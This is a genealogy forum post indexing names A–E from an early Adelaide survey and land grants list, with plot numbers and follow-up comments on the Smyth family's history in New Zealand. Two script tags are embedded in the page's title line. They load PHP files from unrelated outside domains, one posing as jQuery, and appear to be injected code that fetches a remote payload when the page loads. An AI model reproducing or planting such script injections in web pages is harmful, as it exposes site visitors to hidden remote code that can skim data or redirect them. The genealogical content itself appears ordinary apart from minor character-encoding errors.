EARLY ADELAIDE. Survey and Land Grants. Names index A-E<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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EARLY ADELAIDE. Survey and Land Grants. Names index A-E

Journal by AliciaG

Whilst searching online for one of my ancestors, Hibernia Smyth, I found a letter to the editor by him that had been reproduced in a New Zealand publication but had originally been published an Adelaide newspaper. So I tried searching in Trove database of digitised Australian newspapers.
Among other things I found this article about the early land grants in Adelaide with a full list of names. I wasn't even aware Hibernia had been in Australia before coming to New Zealand so I figured the list might be useful to others and I haven't been able to find it anywhere else online.
So I have created an alphabetical index to the personal names in the land grants. To read the original article follow this link.
The numbers beside each name relate to plot numbers, the article and accompanying map will help you locate where in Adelaide they are.
I have divided the list into several portions to keep my posts from being too long

ABBOTT, Giles jun. of Adelaide 611,720,750,935
ABBOTT, Giles sen. of Adelaide 706
ABBOTT, Jacob of Adelaide 936
ABBOTT, John of Halifax 193,321,547,735
ACOCKS, Thomas of Surrey 1034
ADAMS, James 982
ADAMS, John William and Thomas NICHOLSON 1002
AFFORD, John of Adelaide 628
AGNEW, Patrick vans 1,161
ANGAS, George Fife of London 277,478,484,972-973
BAGG, John and James CRONK 523
BAGNOLD, William of London 325
BAGULEY, Catherine 36
BAILEY, John of Van Diemen?s Land 395
BARKER, Alfred of the Rapid 449
BARNARD, John Erving of Adelaide 705
BARNES, George of Lincoln?s Inn Fields 12,32,475,545
BARNES, George of London 725
BEARE, Thomas Hudson 821-822,831-832
BEARE, Thomas Hudson of Middlesex 212
BECK, Charles 143
BENNETT, Somerton Travers 748
BENNETT, William of Halifax 342
BENNETT, William of Standon 701
BERKELEY, Charles 752
BERKELEY, Charles of Adelaide 35,75,192,736-738,796
BIRCH, Richard William 823,830
BIRCH, Richard William of Derby 460
BIRDSEYE, Cornelius of Adelaide 55
BLACK, William of Adelaide 689
BLOUNT, Michael Joseph of Covent Garden 265
BLUNDELL, Richard 716
BLUNDELL, Richard of Chester 324,971
BLUNDEN, Richard of Hooton 210,229
BLUNDEN, Stephen of Adelaide 465
BLUNDEN, Stephen of Hooton, Chester 186
BOLTING, Jane of Sussex, spinster 707
BOUCHER, Frederick of London 384,668
BORRODAILE, Abraham of London 327,386,431-432
BREAKER, Isaac of Adelaide 526
BRISTOW, Robert of Adelaide 474,675,929
BROWN, John 72,733-734,779-780,855-857,884-886
BROWN, John of Adelaide 204-5,451,454-456,1029
BROWN, John of Glenelz 817-818
BROWN, George of Adelaide 990
BROWN, William Voules of Adelaide 486,937
BRUCE, William of Calcutta 5,219,235
BRYANT, E. now Government property 1037
CARTER, Caroline of Adelaide 670-671
CARTER, Caroline of Adelaide, spinster 652-653
CATCHLOVE, Edward of Adelaide 457
CATOR, Bertie Cornelius 787
CATOR, Bertie Cornelius of Kent 458,531,603,676,
CHAMBERS, James 824
CHAMBERS, James of Adelaide 199,829
CHAPMAN, Samuel of Adelaide 448
CHEGWYN, Joseph 761
COLTER, Thomas Young of Adelaide 144-145
COCK, John of Tottenham, Middlesex 134
COCK, Robert of Adelaide 73,80,714
COCK, Robert and Rowland HILL 167
CODMORE, Daniel of Adelaide 801
CORTIS, Charles of Sussex 538,749
CORTIS, Charles of Worthing 177
CORTIS, George of Sussex 804
COXALL, William of Adelaide 158,773
CRIPPEN, Charles of London 54
CRISP, Clement of Adelaide 257
CRONK, James and John BAGG 523
CRONK, James of Adelaide 642
CROWTHER, Jonathon of Halifax 191,540,562,567,723
DARTON, Thomas Gates of Finsbury, Middlesex 21
DARTON, Thomas Gates of Middlesex 702
DARTON, Thomas Gates of London 345
DAVIES, Joseph and John MORPHETT 605
DAVIES, Joseph of Adelaide 607
DENDY, Samuel of Middlesex 887,904
DENDY, Samuel of Montagu Street, London 180
DENDY, Samuel of Mussel Square 330
DUFF, John Findlay 124
DUVAL, Lewis of London 1039
DYER, Elizabeth of St. Mary?s Islington 256
DYKE, Thomas of Monmouth 140
EAST, George 774
EAST, George of Adelaide 928,933
EAST, Samuel of Adelaide 190
ELDER, Thomas of Adelaide 1035
EMERY, Charlotte of Adelaide 482,617,721
EMERY, Charlotte of Adelaide, widow 617
EMERY, Isaac of Adelaide 483
EMMETT, Henry of Halifax 211,309,459,616,772
EVERARD, Charles George of Adelaide 17,71,303,343,370,533-534,555-556,955

Surnames: SMYTH
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by AliciaG Profile | Research | Contact | Subscribe | Block this user
on 2012-03-17 23:52:04

AliciaG has been a Family Tree Circles member since Jan 2012.

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by janilye on 2012-03-18 03:03:48

well done AliciaG. Big job.

by makonz on 2012-05-28 03:31:05

Hi AliciaG, I came across your post while I was hunting for Hibernia Smyth for one of my children who is researching their cultural heritage. My husband's family is descended from Hibernia Smyth's father (Richard) who married into a Maori tribe up north for a short period of time. Hibernia and his dad moved down to Auckland to avoid the fighting up north, and purchased quite a bit of land in the foothills of Titirangi. Kaurilands School has a stream running through it called Hibernia Stream, which I believe was named after him. I was quite excited to discover a few articles about him in some ancient Glen Eden Journals I found at school. My husband found an article in the Auckland Library some years ago that said they came from Sikerbeen in County Cork.

by AliciaG on 2012-05-30 06:09:29

Hi makonz
Alicia Ann Smyth (married Wilfrid Adlington) was my great grandmother. Her parents were Richard Smyth and Maria Smyth and Hibernicus Fenton Bleazby Smyth was her brother. Maria's father was Captain Hibernicus Scott Smyth. Maria and Richard were cousins. It can get a bit confusing figuring out what Hibernia/Hibernicus/Hibbie Smyth is being talked about sometimes.
There has been a green booklet done on the Smyth family tree some years ago, I'm still trying to get my hands on my mum's copy to get the full details but I know it goes several generations back in Ireland. I'm planning to scan it and can send you a copy by email if you don't have it.

by AliciaG on 2012-06-01 22:15:30

Hi makonz
Have just got hold of my copy of the Smith Smyth Smythe booklet which was compiled by Daphne Smythe Hamilton in the 1980s. It claims to have details of all the descendents of Capt. Hibernicus Scott Smyth but the family you mention don't seem to be in it. I can't find any mention of Captain Smyth's father Richard coming to NZ and it says he died in 1831 before Captain Smyth and his family immigrated to the Southern Hemisphere. However Captain Smyth has a son Hibernicus Richard Smyth and a son-in-law/nephew named Richard Hibernicus Smyth (my great great grandfather)and as mentioned above, Richard Hibernicus Smyth has a son called Hibernicus Fenton Bleazby Smyth.
What dates do you have?
Capt. Hibernicus Scott Smyth with is wife Sarah and his infant son Hibernicus Richard arrive in Adelaide 1837. A daughter Esther is born there before they come to NZ in 1839 and Capt. Smyth buys land from Maori at Manganui. In March 1854 he he was granted 341 acres in the Waitakeres, also owned land at Mt Albert known as the Prince of Wale Estate and in the 1860s had 500 acres at Titirangi.
Hibernicus Richard Smyth owns land at Titirangi and marries Kathleen Templey about 1908, they are not listed as having any descendents.
Richard Hibernicus Smyth is the son of Robert Travers Smyth and Charlotte Bleazeby he was born 1838. He came to NZ in 1859 with his brothers Robert and Samuel and started up a logging and timber mill in the Waitakere, where he was known as the govenor. He purchased over 400 acres of land in Valley Road, Henderson (although my research suggests it was his wife Maria who actually bought the land). He married Maria Smyth, his cousin and daughter of Captain Smyth, in 1867. They had 9 children. He died in 1930.
Let me know how this fits with your research.

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